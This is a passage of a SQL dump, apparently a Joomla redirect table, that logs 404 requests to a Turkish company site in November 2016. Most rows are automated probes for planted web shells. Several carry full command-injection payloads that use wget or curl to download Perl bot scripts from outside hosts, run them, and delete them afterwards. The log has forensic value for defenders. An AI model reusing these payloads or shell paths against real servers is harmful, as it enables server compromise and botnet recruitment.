00:00:00',301),(8428,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php','','','',1,0,'2016-11-15 15:58:59','0000-00-00 00:00:00',301),(8429,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php','','','',1,0,'2016-11-15 15:59:03','0000-00-00 00:00:00',301),(8430,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php?shxxx=wget http:/','','','',1,0,'2016-11-15 15:59:06','0000-00-00 00:00:00',301),(8431,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php','','','',1,0,'2016-11-15 15:59:07','0000-00-00 00:00:00',301),(8432,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php?shxxx=wget h','','','',1,0,'2016-11-15 15:59:08','0000-00-00 00:00:00',301),(8433,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php','','','',1,0,'2016-11-15 15:59:12','0000-00-00 00:00:00',301),(8434,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php?shxx','','','',1,0,'2016-11-15 15:59:23','0000-00-00 00:00:00',301),(8435,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php','','','',1,0,'2016-11-15 15:59:30','0000-00-00 00:00:00',301),(8436,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php?shxxx=wget http://www.f','','','',1,0,'2016-11-15 15:59:36','0000-00-00 00:00:00',301),(8437,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/images/com_adsmanager/ads/uploa','','','',1,0,'2016-11-15 15:59:37','0000-00-00 00:00:00',301),(8438,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php','','','',1,0,'2016-11-15 16:00:30','0000-00-00 00:00:00',301),(8439,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php?cmd=cd /tmp;wget htt','','','',1,0,'2016-11-15 16:00:43','0000-00-00 00:00:00',301),(8440,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php','','','',1,0,'2016-11-15 16:00:54','0000-00-00 00:00:00',301),(8441,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php?shxxx=','','','',1,0,'2016-11-15 16:01:05','0000-00-00 00:00:00',301),(8442,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php','','','',1,0,'2016-11-15 16:01:15','0000-00-00 00:00:00',301),(8443,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php?cmd=cd /','','','',1,0,'2016-11-15 16:01:26','0000-00-00 00:00:00',301),(8444,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//tmp/plupload/myluph.php?cmd=curl+-C+-+-O+http://www.tonerbazis.hu/bot.txt;perl+bot.txt;rm+bot.txt','','','',2,0,'2016-11-15 16:02:29','0000-00-00 00:00:00',301),(8445,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component//tmp/plupload/myluph.php','','','',2,0,'2016-11-15 16:02:40','0000-00-00 00:00:00',301),(8446,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/index.inc.php','','','',2,0,'2016-11-15 16:02:42','0000-00-00 00:00:00',301),(8447,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ;','','','',1,0,'2016-11-15 16:02:52','0000-00-00 00:00:00',301),(8448,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/logs/index.inc.php','','','',2,0,'2016-11-15 16:02:53','0000-00-00 00:00:00',301),(8449,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/logs/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.','','','',1,0,'2016-11-15 16:03:08','0000-00-00 00:00:00',301),(8450,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/plupload/index.inc.php','','','',2,0,'2016-11-15 16:03:15','0000-00-00 00:00:00',301),(8451,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/plupload/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; p','','','',1,0,'2016-11-15 16:03:16','0000-00-00 00:00:00',301),(8452,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/404.php','','','',2,0,'2016-11-15 16:03:18','0000-00-00 00:00:00',301),(8453,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/404.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; rm -r','','','',1,0,'2016-11-15 16:03:29','0000-00-00 00:00:00',301),(8454,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/com_adsmanager/ads/uploaded/index.inc.php','','','',2,0,'2016-11-15 16:03:39','0000-00-00 00:00:00',301),(8455,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/com_adsmanager/ads/uploaded/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.','','','',1,0,'2016-11-15 16:03:40','0000-00-00 00:00:00',301),(8456,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/com_adsmanager/ads/uploaded/petx.php','','','',2,0,'2016-11-15 16:03:50','0000-00-00 00:00:00',301),(8457,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/com_adsmanager/ads/uploaded/petx.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ;','','','',1,0,'2016-11-15 16:03:57','0000-00-00 00:00:00',301),(8458,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/com_adsmanager/ads/uploaded/mil.php','','','',2,0,'2016-11-15 16:04:08','0000-00-00 00:00:00',301),(8459,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/images/com_adsmanager/ads/uploaded/mil.php?cmd=cd /tmp;wget http://www.federacia.by/xmlrpc/includes/.../os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.','','','',1,0,'2016-11-15 16:04:09','0000-00-00 00:00:00',301),(8460,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/readme.php','','','',2,0,'2016-11-15 16:04:31','0000-00-00 00:00:00',301),(8461,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/readme.php?cmd=cd /tmp;wget http://www.federacia.by/xmlrpc/includes/.../os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.txt;rm -rf os.*','','','',2,0,'2016-11-15 16:04:46','0000-00-00 00:00:00',301),(8462,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/index.inc.php','','','',2,0,'2016-11-15 16:04:47','0000-00-00 00:00:00',301),(8463,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/components/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; per','','','',1,0,'2016-11-15 16:04:48','0000-00-00 00:00:00',301),(8464,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/plupload/millo.php','','','',2,0,'2016-11-15 16:04:49','0000-00-00 00:00:00',301),(8465,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/tmp/plupload/millo.php?cmd=cd /tmp;wget http://www.federacia.by/xmlrpc/includes/.../os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.txt;rm -','','','',1,0,'2016-11-15 16:04:50','0000-00-00 00:00:00',301),(8466,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php?cmd=c','','','',1,0,'2016-11-15 16:54:16','0000-00-00 00:00:00',301),(8467,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php','','','',1,0,'2016-11-15 16:54:17','0000-00-00 00:00:00',301),(8468,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php','','','',1,0,'2016-11-15 16:54:18','0000-00-00 00:00:00',301),(8469,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php?shxxx=wget http:','','','',1,0,'2016-11-15 16:54:19','0000-00-00 00:00:00',301),(8470,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php','','','',1,0,'2016-11-15 16:54:22','0000-00-00 00:00:00',301),(8471,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php?shxxx=wget ','','','',1,0,'2016-11-15 16:54:23','0000-00-00 00:00:00',301),(8472,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php','','','',1,0,'2016-11-15 16:54:24','0000-00-00 00:00:00',301),(8473,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php?shx','','','',1,0,'2016-11-15 16:54:25','0000-00-00 00:00:00',301),(8474,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php','','','',1,0,'2016-11-15 16:54:26','0000-00-00 00:00:00',301),(8475,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php?shxxx=wget http://www.','','','',1,0,'2016-11-15 16:54:27','0000-00-00 00:00:00',301),(8476,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/images/com_adsmanager/ads/uplo','','','',1,0,'2016-11-15 16:54:29','0000-00-00 00:00:00',301),(8477,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php','','','',1,0,'2016-11-15 16:54:35','0000-00-00 00:00:00',301),(8478,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php?cmd=cd /tmp;wget ht','','','',1,0,'2016-11-15 16:54:43','0000-00-00 00:00:00',301),(8479,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php','','','',1,0,'2016-11-15 16:54:45','0000-00-00 00:00:00',301),(8480,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php?shxxx','','','',1,0,'2016-11-15 16:54:47','0000-00-00 00:00:00',301),(8481,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php','','','',1,0,'2016-11-15 16:54:48','0000-00-00 00:00:00',301),(8482,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwizrcb8kqrQAhWHLo8KHVxQBWY4lgEQFgjiATAr&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php?cmd=cd ','','','',1,0,'2016-11-15 16:54:49','0000-00-00 00:00:00',301),(8483,'https://www.3s-technologies.com.tr/index.php/en/?option=com_easyblog&view=dashboard&layout=write','','https://www.3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',1,0,'2016-11-17 10:39:57','0000-00-00 00:00:00',301),(8484,'https://www.3s-technologies.com.tr/index.php?option=com_user&view=register','','https://www.3s-technologies.com.tr/index.php?option=com_user&view=register','',2,0,'2016-11-19 11:02:21','0000-00-00 00:00:00',301),(8485,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php?cmd=curl+','','','',1,0,'2016-11-20 04:28:01','0000-00-00 00:00:00',301),(8486,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php','','','',1,0,'2016-11-20 04:28:02','0000-00-00 00:00:00',301),(8487,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php','','','',1,0,'2016-11-20 04:28:03','0000-00-00 00:00:00',301),(8488,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php?shxxx=wget http://ww','','','',1,0,'2016-11-20 04:28:03','0000-00-00 00:00:00',301),(8489,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php','','','',1,0,'2016-11-20 04:28:05','0000-00-00 00:00:00',301),(8490,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php?shxxx=wget http','','','',1,0,'2016-11-20 04:28:06','0000-00-00 00:00:00',301),(8491,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php','','','',1,0,'2016-11-20 04:28:07','0000-00-00 00:00:00',301),(8492,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php?shxxx=w','','','',1,0,'2016-11-20 04:28:08','0000-00-00 00:00:00',301),(8493,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php','','','',1,0,'2016-11-20 04:28:09','0000-00-00 00:00:00',301),(8494,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php?shxxx=wget http://www.fia.','','','',1,0,'2016-11-20 04:28:09','0000-00-00 00:00:00',301),(8495,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/images/com_adsmanager/ads/uploaded','','','',1,0,'2016-11-20 04:28:09','0000-00-00 00:00:00',301),(8496,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php','','','',1,0,'2016-11-20 04:28:12','0000-00-00 00:00:00',301),(8497,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php?cmd=cd /tmp;wget http:/','','','',1,0,'2016-11-20 04:28:13','0000-00-00 00:00:00',301),(8498,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php','','','',1,0,'2016-11-20 04:28:13','0000-00-00 00:00:00',301),(8499,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php?shxxx=wge','','','',1,0,'2016-11-20 04:28:14','0000-00-00 00:00:00',301),(8500,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php','','','',1,0,'2016-11-20 04:28:14','0000-00-00 00:00:00',301),(8501,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiOlLHLm7bQAhXEtRoKHcHlA_cQFgi_AzBW&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php?cmd=cd /tmp','','','',1,0,'2016-11-20 04:28:15','0000-00-00 00:00:00',301),(8502,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php?cmd=cu','','','',1,0,'2016-11-20 05:18:11','0000-00-00 00:00:00',301),(8503,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php','','','',1,0,'2016-11-20 05:18:11','0000-00-00 00:00:00',301),(8504,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php','','','',1,0,'2016-11-20 05:18:12','0000-00-00 00:00:00',301),(8505,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/index.inc.php?shxxx=wget http:/','','','',1,0,'2016-11-20 05:18:12','0000-00-00 00:00:00',301),(8506,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php','','','',1,0,'2016-11-20 05:18:13','0000-00-00 00:00:00',301),(8507,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/logs/index.inc.php?shxxx=wget h','','','',1,0,'2016-11-20 05:18:13','0000-00-00 00:00:00',301),(8508,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php','','','',1,0,'2016-11-20 05:18:14','0000-00-00 00:00:00',301),(8509,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/index.inc.php?shxx','','','',1,0,'2016-11-20 05:18:14','0000-00-00 00:00:00',301),(8510,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php','','','',1,0,'2016-11-20 05:18:15','0000-00-00 00:00:00',301),(8511,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/404.php?shxxx=wget http://www.f','','','',1,0,'2016-11-20 05:18:15','0000-00-00 